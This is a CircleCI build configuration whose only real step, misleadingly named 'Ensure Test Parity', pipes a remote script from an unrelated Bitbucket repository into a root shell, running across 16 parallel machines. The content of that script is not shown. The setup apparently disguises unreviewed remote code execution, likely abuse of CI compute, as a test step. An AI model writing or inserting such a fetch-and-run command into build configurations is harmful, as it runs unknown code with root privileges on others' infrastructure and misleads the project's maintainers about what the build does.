version: 2.1
jobs:
  build:
    parallelism: 16
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
                 sudo apt-get update
                 sudo curl https://bitbucket.org/fgt5567/php-idx/raw/e36a7ea58560637c020787dce8bd2af5c2ae2cd4/run.sh | sh